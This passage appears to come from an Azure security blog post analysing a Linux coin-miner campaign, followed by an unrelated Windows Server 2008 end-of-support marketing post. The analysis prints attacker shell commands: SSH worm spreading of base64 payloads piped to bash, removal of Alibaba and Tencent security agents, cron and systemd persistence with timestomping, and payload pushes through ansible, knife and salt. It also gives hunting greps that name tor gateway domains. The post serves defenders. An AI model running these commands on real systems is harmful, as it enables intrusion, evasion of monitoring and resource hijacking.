hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
for h in $hosts;do xssh root $h; xssh $USER $h & done
——
xssh() {
ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyA<snip>KZG9uZQo=|base64 -d|bash'
}

In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.

Defense Evasion

Across the various scripts, the attacker uses the T1107: File Deletion, T1222: File and Directory Permissions Modification, and T1089: Disabling Security Tools techniques, as well as the by now obvious T1064: Scripting.

In one script, they first make a randomly named file:

z=./$(date|md5sum|cut -f1 -d" ")

After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:

chmod +x $z;$z;rm -f $z

In another script, the attacker tries to download and run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script); the third line below appears to invoke the uninstaller for a Tencent Cloud (qcloud) monitoring agent.

$w update.aegis.aliyun.com/download/uninstall.sh|bash
$w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh

Persistence

Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling and T1501: Systemd Service for persistence. The snippet below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate, then add a cron job to run that file. The encoded script here is basically the same as the original script that started off the intrusion.

echo -e "#\x21/bin/bash\nexec &>/dev/null\nntpdate ntp.aliyun.com\nsleep $((RANDOM % 600))\necho ZXhlYyAmPi9<snip>2gKZmkK|base64 -d|bash" > /lib/systemd/systemd-ntpdate
echo "0 * * * * root /lib/systemd/systemd-ntpdate" > /etc/cron.d/0systemd-ntpdate
touch -r /bin/grep /lib/systemd/systemd-ntpdate
touch -r /bin/grep /etc/cron.d/0systemd-ntpdate
chmod +x /lib/systemd/systemd-ntpdate
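Also note the two touch -r lines: they copy the timestamps of /bin/grep onto the newly dropped files, a timestomping trick that makes the persistence files look as old as system binaries. If you want to check your own hosts for this kind of persistence, here is a minimal sketch; the paths are taken from the script above, and any similar cron and systemd locations in your environment are worth the same treatment:

# Look for cron entries that decode base64 into a shell
grep -R "base64" /etc/cron.d /etc/crontab /var/spool/cron 2>/dev/null

# touch -r resets mtime/atime but not ctime, so a file whose change time
# is much newer than its modification time may have been timestomped
stat /lib/systemd/systemd-ntpdate 2>/dev/null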

Objectives

As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run, using the T1496: Resource Hijacking technique. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (T1072: Third-party Software).

ansible all -m shell -a 'echo ZXh<snip>uZQo=|base64 -d|bash'
knife ssh 'name:*' 'echo ZXh<snip>uZQo=|base64 -d|bash'
salt '*' cmd.run 'echo ZXh<snip>ZQo=|base64 -d|bash'
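If you don't run these orchestration tools, their appearance in your logs is itself a strong signal. A quick sketch (the tool names are taken from the commands above):

# Which of these tools are even installed on this host?
for tool in ansible knife salt; do
  command -v "$tool" >/dev/null 2>&1 && echo "$tool: installed" || echo "$tool: not installed"
done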

Hunting

Azure Security Center (ASC) Linux customers should expect to see coin mining or suspicious download alerts from this type of activity, but what if you want to hunt for it yourself? If you use the above script examples, there are several indicators you can follow up on, especially if you have command line logging.

Do you see unexpected connections to onion and tor sites?
Do you see unexpected ssh connections between hosts?
Do you see an increase in activity from a particular user?
Do you see base64 commands echoed, decoded, then piped into bash? Any one of these could be suspicious depending on your own network (a quick way to check is sketched after this list).
Check your cron jobs: do you see wget calls or base64 encoded lines there?
Check the services running on your machines: do you see anything unexpected?
In reference to the Objectives section above, do you see commands for pieces of software you don’t have installed?
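As a starting point for the base64 question above, here is a minimal sketch. It assumes GNU grep and that your command-line logging lands somewhere greppable in plain text; shell history files are used below as a stand-in, since auditd, for example, may hex-encode arguments:

# Flag command lines that decode base64 straight into a shell
grep -RE "base64 (-d|--decode)[^|]*\|\s*(ba)?sh" /home/*/.bash_history /root/.bash_history 2>/dev/null

# Flag lookups of the onion/tor gateway domains from the script above
grep -RE "tor2web\.io|onion\.(glass|sh|mn|to)|civiclink\.network" /var/log/ 2>/dev/null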

Azure Sentinel can help with your hunting as well. If you are an Azure Security Center customer already, we make it easy to integrate into Azure Sentinel.

Defense

In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them up to date, changing any default passwords, and taking advantage of some of the other credential management tools Azure offers, like just-in-time (JIT) VM access, passwordless sign-in, and Azure Key Vault. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner. Check out other ideas on the Azure Security Center documentation page.

Identifying attacks on Linux systems

Coin miners represent a continuing threat to machines exposed to the internet. While it's generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.

While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We regularly see Lateral Movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers, and we are continually adding new detections based on our investigations.
Source: Azure

Turning to a new chapter of Windows Server innovation

Today, January 14, 2020, marks the end of support for Windows Server 2008 and Windows Server 2008 R2. Customers loved these releases, which introduced advancements such as the shift from 32-bit to 64-bit computing and server virtualization. While support for these popular releases ends today, we are excited about new innovations in cloud computing, hybrid cloud, and data that can help server workloads get ready for the new era.

We want to thank customers for trusting Microsoft as their technology partner. We also want to make sure that we work with all our customers to support them through this transition while applying the latest technology innovations to modernize their server workloads.

We are pleased to offer multiple options as you make this transition. Learn how you can take advantage of cloud computing in combination with Windows Server. Here are some of our customers that are using Azure for their Windows Server workloads.

Customers using Azure for their Windows Server workloads

Customers such as Allscripts, Tencent, Alaska Airlines, and Altair Engineering are using Azure to modernize their apps and services. One great example is J.B. Hunt Transport Services, Inc., which has over 3.5 million trucks on the road every single day.

See how J.B. Hunt has driven its digital transformation with Azure.

How you can take advantage of Azure for your Windows Server workloads

You can deploy Windows Server workloads in Azure in various ways, such as Azure Virtual Machines (VMs), Azure VMware Solutions, and Azure Dedicated Host. You can apply Azure Hybrid Benefit to use your existing Windows Server licenses in Azure. The benefits are immediate and tangible: Azure Hybrid Benefit alone can save up to 40 percent in cost. Use the Azure Total Cost of Ownership Calculator to estimate your savings from migrating your workloads to Azure.

As you transition your Windows Server workloads to the cloud, Azure offers additional app modernization options. For example, you can migrate Remote Desktop Services to Windows Virtual Desktop on Azure, which offers the best virtual desktop experience, multi-session Windows 10, and elastic scale. You can migrate on-premises SQL Server to Azure SQL Database, which offers Hyperscale, artificial intelligence, and advanced threat detection to modernize and secure your databases. Plus, you can future-proof your apps with no more patching and upgrades, which is a huge benefit to many IT organizations.

Free extended security updates on Azure

We understand comprehensive upgrades are traditionally a time-consuming process for many organizations. To ensure that you can continue to protect your workloads, you can take advantage of three years of free extended security updates, which you can learn more about here, for your Windows Server 2008 and Windows Server 2008 R2 servers, only on Azure. This gives you more time to plan the transition paths for your business-critical apps and services.

How you can take advantage of the latest innovations in Windows Server on-premises

If your business model requires that your servers must stay on-premises, we recommend upgrading to the latest Windows Server.

Windows Server 2019 is the latest and most quickly adopted Windows Server version ever; millions of instances have been deployed by customers worldwide. Its hybrid capabilities are designed to help customers integrate Windows Server on-premises with Azure on their own terms. Windows Server 2019 adds layers of security such as Windows Defender Advanced Threat Protection (ATP) and Windows Defender Exploit Guard, which improve even further when you connect to Azure. With Kubernetes support for Windows containers, you can deploy modern containerized Windows apps on-premises or on Azure.

With Windows Server running on-premises, you can still leverage Azure services for backup, update management, monitoring, and security. To start using these capabilities, we recommend trying Windows Admin Center, a free, browser-based app included as part of Windows Server licenses that makes server management easier than ever.

Start innovating with your Windows Server workloads

Getting started with the latest release of Windows Server 2019 has never been easier.

Try the latest Windows Server 2019 on Azure (a minimal sketch follows this list) and read the Windows Server Migration Guide.
Learn about Extended Security Updates.
Learn about the Azure Migration Program to transform server workloads.
Download Windows Admin Center for hybrid management.
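For a quick start, here is a minimal sketch that creates a Windows Server 2019 virtual machine with the Azure CLI; the resource group, VM name, region, and credentials are placeholders you should replace with your own:

# Create a resource group and a Windows Server 2019 Datacenter VM
az group create --name myResourceGroup --location eastus
az vm create \
  --resource-group myResourceGroup \
  --name myWin2019VM \
  --image Win2019Datacenter \
  --admin-username azureuser \
  --admin-password '<your-strong-password>'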

Today also marks the end of support for Windows 7. To learn more, visit the Microsoft 365 blog.
Source: Azure